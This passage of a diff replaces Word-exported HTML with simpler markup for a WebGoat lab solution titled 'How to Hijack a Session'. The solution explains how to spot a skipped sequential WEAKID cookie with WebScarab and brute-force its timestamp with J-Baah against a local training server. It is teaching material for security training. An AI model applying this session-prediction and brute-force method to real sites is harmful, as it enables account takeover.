-   UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
-  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
-  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
-  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
-  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
-  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
-  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
-  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
-  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Dark List Accent 3"/>
-  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
-  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
-  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
-  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
-  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Light List Accent 4"/>
-  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
-  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
-  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
-  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
-  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
-  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
-  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
-  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
-  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Dark List Accent 4"/>
-  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
-  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
-  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
-  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
-  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Light List Accent 5"/>
-  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
-  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
-  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
-  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
-  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
-  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
-  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
-  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
-  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Dark List Accent 5"/>
-  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
-  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
-  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
-  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
-  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Light List Accent 6"/>
-  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
-  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
-  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
-  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
-  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
-  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
-  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
-  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
-  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Dark List Accent 6"/>
-  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
-  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
-  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
-  <w:LsdException Locked="false" Priority="19" SemiHidden="false"
-   UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
-  <w:LsdException Locked="false" Priority="21" SemiHidden="false"
-   UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
-  <w:LsdException Locked="false" Priority="31" SemiHidden="false"
-   UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
-  <w:LsdException Locked="false" Priority="32" SemiHidden="false"
-   UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
-  <w:LsdException Locked="false" Priority="33" SemiHidden="false"
-   UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
-  <w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
-  <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
- </w:LatentStyles>
-</xml><![endif]-->
-<style>
-<!--
- /* Font Definitions */
- @font-face
-	{font-family:Wingdings;
-	panose-1:5 0 0 0 0 0 0 0 0 0;
-	mso-font-charset:2;
-	mso-generic-font-family:auto;
-	mso-font-pitch:variable;
-	mso-font-signature:0 268435456 0 0 -2147483648 0;}
-@font-face
-	{font-family:"MS Mincho";
-	panose-1:2 2 6 9 4 2 5 8 3 4;
-	mso-font-alt:"\FF2D\FF33 \660E\671D";
-	mso-font-charset:128;
-	mso-generic-font-family:modern;
-	mso-font-pitch:fixed;
-	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
-@font-face
-	{font-family:"Cambria Math";
-	panose-1:2 4 5 3 5 4 6 3 2 4;
-	mso-font-charset:0;
-	mso-generic-font-family:roman;
-	mso-font-pitch:variable;
-	mso-font-signature:-1610611985 1107304683 0 0 159 0;}
-@font-face
-	{font-family:Tahoma;
-	panose-1:2 11 6 4 3 5 4 4 2 4;
-	mso-font-charset:0;
-	mso-generic-font-family:swiss;
-	mso-font-pitch:variable;
-	mso-font-signature:1627400839 -2147483648 8 0 66047 0;}
-@font-face
-	{font-family:"\@MS Mincho";
-	panose-1:2 2 6 9 4 2 5 8 3 4;
-	mso-font-charset:128;
-	mso-generic-font-family:modern;
-	mso-font-pitch:fixed;
-	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
- /* Style Definitions */
- p.MsoNormal, li.MsoNormal, div.MsoNormal
-	{mso-style-unhide:no;
-	mso-style-qformat:yes;
-	mso-style-parent:"";
-	margin:0cm;
-	margin-bottom:.0001pt;
-	mso-pagination:widow-orphan;
-	font-size:12.0pt;
-	font-family:"Times New Roman","serif";
-	mso-fareast-font-family:"Times New Roman";}
-h1
-	{mso-style-unhide:no;
-	mso-style-qformat:yes;
-	mso-style-link:"Heading 1 Char";
-	mso-style-next:Normal;
-	margin-top:12.0pt;
-	margin-right:0cm;
-	margin-bottom:3.0pt;
-	margin-left:0cm;
-	mso-pagination:widow-orphan;
-	page-break-after:avoid;
-	mso-outline-level:1;
-	font-size:16.0pt;
-	font-family:"Arial","sans-serif";
-	mso-fareast-font-family:"MS Mincho";
-	mso-font-kerning:16.0pt;
-	mso-fareast-language:JA;
-	font-weight:bold;}
-h2
-	{mso-style-noshow:yes;
-	mso-style-priority:9;
-	mso-style-qformat:yes;
-	mso-style-link:"Heading 2 Char";
-	mso-style-next:Normal;
-	margin-top:10.0pt;
-	margin-right:0cm;
-	margin-bottom:0cm;
-	margin-left:0cm;
-	margin-bottom:.0001pt;
-	mso-pagination:widow-orphan lines-together;
-	page-break-after:avoid;
-	mso-outline-level:2;
-	font-size:13.0pt;
-	font-family:"Cambria","serif";
-	mso-ascii-font-family:Cambria;
-	mso-ascii-theme-font:major-latin;
-	mso-fareast-font-family:"Times New Roman";
-	mso-fareast-theme-font:major-fareast;
-	mso-hansi-font-family:Cambria;
-	mso-hansi-theme-font:major-latin;
-	mso-bidi-font-family:"Times New Roman";
-	mso-bidi-theme-font:major-bidi;
-	color:#4F81BD;
-	mso-themecolor:accent1;
-	font-weight:bold;}
-p.MsoCaption, li.MsoCaption, div.MsoCaption
-	{mso-style-noshow:yes;
-	mso-style-qformat:yes;
-	mso-style-next:Normal;
-	margin:0cm;
-	margin-bottom:.0001pt;
-	mso-pagination:widow-orphan;
-	font-size:10.0pt;
-	font-family:"Times New Roman","serif";
-	mso-fareast-font-family:"Times New Roman";
-	font-weight:bold;}
-p.MsoEnvelopeReturn, li.MsoEnvelopeReturn, div.MsoEnvelopeReturn
-	{mso-style-noshow:yes;
-	mso-style-priority:99;
-	margin:0cm;
-	margin-bottom:.0001pt;
-	mso-pagination:widow-orphan;
-	font-size:12.0pt;
-	font-family:"Times New Roman","serif";
-	mso-fareast-font-family:"Times New Roman";
-	mso-fareast-theme-font:major-fareast;}
-a:link, span.MsoHyperlink
-	{mso-style-noshow:yes;
-	color:blue;
-	text-decoration:underline;
-	text-underline:single;}
-a:visited, span.MsoHyperlinkFollowed
-	{mso-style-noshow:yes;
-	mso-style-priority:99;
-	color:purple;
-	mso-themecolor:followedhyperlink;
-	text-decoration:underline;
-	text-underline:single;}
-p
-	{mso-style-noshow:yes;
-	mso-style-priority:99;
-	mso-margin-top-alt:auto;
-	margin-right:0cm;
-	mso-margin-bottom-alt:auto;
-	margin-left:0cm;
-	mso-pagination:widow-orphan;
-	font-size:12.0pt;
-	font-family:"Times New Roman","serif";
-	mso-fareast-font-family:"Times New Roman";}
-p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
-	{mso-style-noshow:yes;
-	mso-style-priority:99;
-	mso-style-link:"Balloon Text Char";
-	margin:0cm;
-	margin-bottom:.0001pt;
-	mso-pagination:widow-orphan;
-	font-size:8.0pt;
-	font-family:"Tahoma","sans-serif";
-	mso-fareast-font-family:"Times New Roman";}
-span.Heading1Char
-	{mso-style-name:"Heading 1 Char";
-	mso-style-unhide:no;
-	mso-style-locked:yes;
-	mso-style-link:"Heading 1";
-	mso-ansi-font-size:16.0pt;
-	mso-bidi-font-size:16.0pt;
-	font-family:"MS Mincho";
-	mso-ascii-font-family:"MS Mincho";
-	mso-fareast-font-family:"MS Mincho";
-	mso-hansi-font-family:"MS Mincho";
-	mso-bidi-font-family:Arial;
-	mso-font-kerning:16.0pt;
-	mso-fareast-language:JA;
-	font-weight:bold;}
-span.Heading2Char
-	{mso-style-name:"Heading 2 Char";
-	mso-style-noshow:yes;
-	mso-style-priority:9;
-	mso-style-unhide:no;
-	mso-style-locked:yes;
-	mso-style-link:"Heading 2";
-	mso-ansi-font-size:13.0pt;
-	mso-bidi-font-size:13.0pt;
-	font-family:"Cambria","serif";
-	mso-ascii-font-family:Cambria;
-	mso-ascii-theme-font:major-latin;
-	mso-fareast-font-family:"Times New Roman";
-	mso-fareast-theme-font:major-fareast;
-	mso-hansi-font-family:Cambria;
-	mso-hansi-theme-font:major-latin;
-	color:#4F81BD;
-	mso-themecolor:accent1;
-	font-weight:bold;}
-span.BalloonTextChar
-	{mso-style-name:"Balloon Text Char";
-	mso-style-noshow:yes;
-	mso-style-priority:99;
-	mso-style-unhide:no;
-	mso-style-locked:yes;
-	mso-style-link:"Balloon Text";
-	mso-ansi-font-size:8.0pt;
-	mso-bidi-font-size:8.0pt;
-	font-family:"Tahoma","sans-serif";
-	mso-ascii-font-family:Tahoma;
-	mso-fareast-font-family:"Times New Roman";
-	mso-hansi-font-family:Tahoma;
-	mso-bidi-font-family:Tahoma;}
-.MsoChpDefault
-	{mso-style-type:export-only;
-	mso-default-props:yes;
-	font-size:10.0pt;
-	mso-ansi-font-size:10.0pt;
-	mso-bidi-font-size:10.0pt;
-	mso-ascii-font-family:Arial;
-	mso-fareast-font-family:Calibri;
-	mso-fareast-theme-font:minor-latin;
-	mso-hansi-font-family:Arial;
-	mso-bidi-font-family:"Times New Roman";
-	mso-bidi-theme-font:major-bidi;}
-@page Section1
-	{size:612.0pt 792.0pt;
-	margin:72.0pt 72.0pt 72.0pt 72.0pt;
-	mso-header-margin:35.4pt;
-	mso-footer-margin:35.4pt;
-	mso-paper-source:0;}
-div.Section1
-	{page:Section1;}
--->
-</style>
-<!--[if gte mso 10]>
-<style>
- /* Style Definitions */
- table.MsoNormalTable
-	{mso-style-name:"Table Normal";
-	mso-tstyle-rowband-size:0;
-	mso-tstyle-colband-size:0;
-	mso-style-noshow:yes;
-	mso-style-priority:99;
-	mso-style-qformat:yes;
-	mso-style-parent:"";
-	mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
-	mso-para-margin:0cm;
-	mso-para-margin-bottom:.0001pt;
-	mso-pagination:widow-orphan;
-	font-size:10.0pt;
-	font-family:"Arial","sans-serif";
-	mso-bidi-font-family:"Times New Roman";
-	mso-bidi-theme-font:major-bidi;}
-</style>
-<![endif]--><!--[if gte mso 9]><xml>
- <o:shapedefaults v:ext="edit" spidmax="3074"/>
-</xml><![endif]--><!--[if gte mso 9]><xml>
- <o:shapelayout v:ext="edit">
-  <o:idmap v:ext="edit" data="1"/>
- </o:shapelayout></xml><![endif]-->
+<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
+<title>Solution: How to Hijack a Session</title>
+<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
 </head>
+<body>
+<p><b>Lesson Plan Title:</b> How to Hijack a Session</p>
 
-<body lang=EN-US link=blue vlink=purple style='tab-interval:36.0pt'>
+<p><b>Concept / Topic To Teach:</b><br/>
+Application developers who develop their own session IDs frequently forget to incorporate the complexity and randomness necessary for security. If the user specific session ID is not complex and random, then the application is highly susceptible to session-based brute force attacks.
+</p> 
 
-<div class=Section1>
+<p><b>General Goal(s):</b><br/>
+Try to access an authenticated session belonging to someone else. <br/><br/>
+In this lesson we are trying to predict the WEAKID value. THe WEAKID is used to differentiate authenticated and anonymous users of WebGoat.
+</p>
 
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+<b>Solution:</b><br/><br/>
+The easiest way to complete this lesson is to use WebScarab's Session ID Analysis feature. The Solution Videos provide another method of uncovering it as well.<br/><br/>
+To access the Session ID Analysis, you need to put WebScarab in its full-featured mode, if it isn't already. This can be enabled by going to <b>Tools -> use full-featured interface</b> in WebScarab.<br/>
+Click on the SessionID Analysis tab at the top of the page, then use the <b>Previous Requests</b> dropdown to select the most recent GET request with a 200 OK header. Its address will end with webgoat/attack, not an image or java file.<br/><br/>
 
-<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Lesson
-Plan Title:</span></b><span style='font-family:"Arial","sans-serif"'> How to
-Hijack a Session<o:p></o:p></span></p>
+<img src="lesson_solutions/WeakSessionID_files/image001.jpg"><br/>
+<font size="2"><b>Selecting the correct GET request for Session ID analysis.</b></font><br/><br/>
 
-<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+Next, we need to make sure that WebScarab is able to fetch the WEAKID cookie. Click the <b>Test</b> button at the bottom of the page. You should get a popup window showing the WEAKID.<br/><br/>
 
-<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Concept /
-Topic To Teach:</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+<img src="lesson_solutions/WeakSessionID_files/image002.jpg"><br/>
+<font size="2"><b>Succesful WEAKID test popup.</b></font><br/><br/>
 
-<!-- Start Instructions -->
+If the popup indicates that no valid session is found, that means there is already a WEAKID value in the request. This prevents the &quot;Set-Cookie&quot; header from being sent in the response. To fix this, delete the <b>WEAKID=value;</b> portion of the Cookie header and press test again.<br/><br/>
 
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Application
-developers who develop their own session IDs frequently forget to incorporate
-the complexity and randomness necessary for security. If the user specific
-session ID is not complex and random, then the application is highly
-susceptible to session-based brute force attacks. <o:p></o:p></span></p>
+Now we need to fetch a set of WEAKIDs. Enter &quot;50&quot; into the <b>Samples</b> field at the bottom of the window, then press <b>Fetch</b>. Switch to the &quot;Analysis&quot; tab. Select the WEAKID option from the <b>Session Identifier</b> dropdown, and the window should populate with WEAKID values.<br/><br/>
 
-<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+The WEAKID is divided into two parts: the first part before the dash is an identifier that increases by 1 in each cookie, and the part after the dash is a time value that is calculated when the request is submitted.<br/>
+Notice that there is sometimes a gap in the first value of the WEAKID, where one number is skipped. The missing value is what we need to log in, we just need to figure out the time stamp value that goes after the dash.<br/><br/>
+It's simple to spot where this value is. Look at the &quot;Difference&quot; column on the analysis screen. Almost all of the values will be only one or two apart. We are looking for the record where this value is around double the rest of them.<br/><br/>
 
-<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>General
-Goal(s):</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+<img src="lesson_solutions/WeakSessionID_files/image003.jpg"><br/>
+<font size="2"><b>Analysis screen with the cookie of interest highlighted.</b></font><br/><br/>
 
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Try to access
-an authenticated session belonging to someone else. <o:p></o:p></span></p>
+This WEAKID follows the one we're trying to find. You will notice the identifier of the cookie preceding the highlighted one is two less, whereas all the other cookies decrease only by one. The one missing is what we want to find:<br/>
+<b><font color="red">16964</font>-1312472439375</b><br/>
+<b><font color="red">16966</font>-1312472439484</b><br/><br/>
+The WEAKID beginning with <b>16965</b> is missing. This is the WEAKID we want, we just need to figure out the second part.<br/>
 
-<!-- Stop Instructions -->
+We'll figure this out by using the brute force method. We will send requests with each possible timestamp value until we find one that is successful. Its timestamp must be between the two surrounding it:<br/>
+<b>16964-<font color="red">1312472439375</font></b><br/>
+<b>16965-<font color="red">?????????????</font></b><br/>
+<b>16966-<font color="red">1312472439484</font></b><br/><br/>
 
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+So our timestamp is between <b>1312472439375</b> and <b>1312472439484</b>. Now we just need a program to do brute force this for us. We will use <a href="http://www.sensepost.com/labs/tools/pentest/j-baah" target="_blank">J-Baah</a>, previously known as Crowbar. Download it and run the .jar.<br/><br/>
+We will configure J-Baah to send our request repeatedly, with a different WEAKID each time. Copy our RAW HTTP Request we used to generate these cookies, found under the Collection tab. Paste it in the Request box in J-Baah.<br/><br/>
 
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>In this
-lesson the purpose is to predict the WEAKID value. The WEAKID is used to
-differentiate authenticated and anonymous users of WebGoat.<o:p></o:p></span></p>
+The WEAKID paramter needs to be put into the request. It will begin with the missing value we figured out before the dash, <b>16965</b> in our case. How do we fill in the rest when we dont know what it is?<br/>
+In this case, we will add <b>WEAKID=16965-1312472439<font color="red">##1##</font>;</b> to the Cookie paramter of our request. The <b><font color="red">##1##</font></b> replaces the part of the timestamp that varies in our range. Next, we specify this range. In the Paramter 1 Tab, we set <b>From</b> as 375, and <b>To</b> as 484.<br/><br/>
 
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+<img src="lesson_solutions/WeakSessionID_files/image004.jpg"><br/>
+<font size="2"><b>J-Baah setup.</b></font><br/><br/>
+Lastly, go to the &quot;Target&quot; tab at the bottom right, and set the <b>Host</b> to localhost and the <b>Port</b> to whichever port WebGoat is using, generally 80 or 8080.<br/>
+Go back to the &quot;Action&quot; tab, and click <b>Base Response</b>. You should see a message on the bottom left that a response is generated successfully. Change <b>Threads</b> to 2 and then press <b>Start</b>. The bottom left window should start filling up with &quot;Hijack a session&quot;<br/><br/>
 
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-no-proof:
-yes'><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600"
- o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f"
- stroked="f">
- <v:stroke joinstyle="miter"/>
- <v:formulas>
-  <v:f eqn="if lineDrawn pixelLineWidth 0"/>
-  <v:f eqn="sum @0 1 0"/>
-  <v:f eqn="sum 0 0 @1"/>
-  <v:f eqn="prod @2 1 2"/>
-  <v:f eqn="prod @3 21600 pixelWidth"/>
-  <v:f eqn="prod @3 21600 pixelHeight"/>
-  <v:f eqn="sum @0 0 1"/>
-  <v:f eqn="prod @6 1 2"/>
-  <v:f eqn="prod @7 21600 pixelWidth"/>
-  <v:f eqn="sum @8 21600 0"/>
-  <v:f eqn="prod @7 21600 pixelHeight"/>
-  <v:f eqn="sum @10 21600 0"/>
- </v:formulas>
- <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
- <o:lock v:ext="edit" aspectratio="t"/>
-</v:shapetype><v:shape id="Picture_x0020_785" o:spid="_x0000_i1034" type="#_x0000_t75"
- style='width:480pt;height:276.75pt;visibility:visible;mso-wrap-style:square'>
- <v:imagedata src="lesson_solutions/WeakSessionID_files/image001.png" o:title=""/>
-</v:shape><![endif]--><![if !vml]><img width=640 height=369
-src="lesson_solutions/WeakSessionID_files/image020.jpg" v:shapes="Picture_x0020_785"><![endif]></span><span
-style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+<img src="lesson_solutions/WeakSessionID_files/image005.jpg"><br/>
+<font size="2"><b>All of the responses for each WEAKID. The successful attempt is highlighted.</b></font><br/><br/>
 
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+Before we go any further, it is important to understand what is happening here. The <b>##1##</b> string is replaced with a different number in the range we specified and the request is sent. The first WEAKID tried is <b>16965-1312472439375</b>, then it tries every timestamp until the last one, <b>16965-1312472439484</b>. J-Baah collects all of these responses and shows them in the bottom left window.<br/><br/>
 
-<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Solution:</span></b><span
-style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+Each line shows one response, and displays important information about it.<br/><br/>
+<b><font color="red">0.99969</font> : 417 : : Hijack a Session</b><br/>
+Clicking base response tries the first WEAKID and sets its response as the control. This first number indicates how similar this response is to the base response. A value of 1 means the responses are identical. The further the number is from 1, the more different this response is.<br/>
+<br/>
+<b>0.99969 : <font color="red">417</font> : : Hijack a Session</b><br/>
+This second number is the value replacing the <b>##1##</b> in our request.<br/><br/>
+<b>0.99969 : 417 : : <font color="red">Hijack a Session</font></b><br/>
+The last portion is the title of the response page. In this case, if it's not &quot;Hijack a Session&quot;, something went wrong.<br/><br/>
 
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+The value indicating similarity to the base response will tell us which WEAKID worked. If everything went swimmingly, there should only be three values for this number. Look again at the screenshot above. There are many responses showing .99969, one showing .9949, then many more showing .99954. The response stayed the same until we got to the WEAKID ending in 429, then it changed. This is where the brute force succeeded. Right click on this response and click &quot;Show Response&quot;.<br/><br/>
 
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>The easiest
-way to complete this lesson is to use WebScarab's Session ID Analysis.<o:p></o:p></span></p>
+<img src="lesson_solutions/WeakSessionID_files/image006.jpg"><br/>
+<font size="2"><b>This WEAKID worked! We hijacked this session.</b></font><br/><br/>
 
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+Refreshing the lesson should show it is complete.<br/><br/>
 
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Go to
-WebScarab and click on the button "SessionID Analysis". Select the last POST
-request from the "Previous requests" drop-down box.<o:p></o:p></span></p>
 
-<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
-"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_786"
- o:spid="_x0000_i1033" type="#_x0000_t75" style='width:480pt;height:276.75pt;
- visibility:visible;mso-wrap-style:square'>
- <v:imagedata src="lesson_solutions/WeakSessionID_files/image003.png" o:title=""/>
-</v:shape><![endif]--><![if !vml]><img width=640 height=369
-src="lesson_solutions/WeakSessionID_files/image021.jpg" v:shapes="Picture_x0020_786"><![endif]></span></p>
-
-<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
-field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
-<span style='mso-element:field-separator'></span><![endif]--><span
-style='mso-no-proof:yes'>1</span><!--[if supportFields]><span style='mso-element:
-field-end'></span><![endif]--> WebScarabs SessionID Analysis<span
-style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
-
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
-
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>To make sure
-that WebScarab is able to fetch the WEAKID cookie, you need to click the "Test"
-button on the bottom of the screen. A pop-up window must be shown like below.<o:p></o:p></span></p>
-
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
-
-<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
-"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_787"
- o:spid="_x0000_i1032" type="#_x0000_t75" style='width:480pt;height:276pt;
- visibility:visible;mso-wrap-style:square'>
- <v:imagedata src="lesson_solutions/WeakSessionID_files/image005.png" o:title="" cropbottom="2719f"/>
-</v:shape><![endif]--><![if !vml]><img width=640 height=368
-src="lesson_solutions/WeakSessionID_files/image022.jpg" v:shapes="Picture_x0020_787"><![endif]></span></p>
-
-<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
-field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
-<span style='mso-element:field-separator'></span><![endif]--><span
-style='mso-no-proof:yes'>2</span><!--[if supportFields]><span style='mso-element:
-field-end'></span><![endif]--> SessionID WEAKID discovered<span
-style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
-
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
-
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>If you don’t
-have a pop-up window with the Extracted Sessionids, you must edit the Request.
-You must delete the WEAKID value from the request. Without this cookie value,
-WebGoat will return a HTTP Header "Set-Cookie: WEAKID=value" so WebScarab
-learns about this value.<o:p></o:p></span></p>
-
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
-
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
-
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Fetch 50
-samples and examine the results. Enter "50" in the "Samples" window and click
-the button "Fetch". You will not see any information about progress.<o:p></o:p></span></p>
-
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
-
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-no-proof:
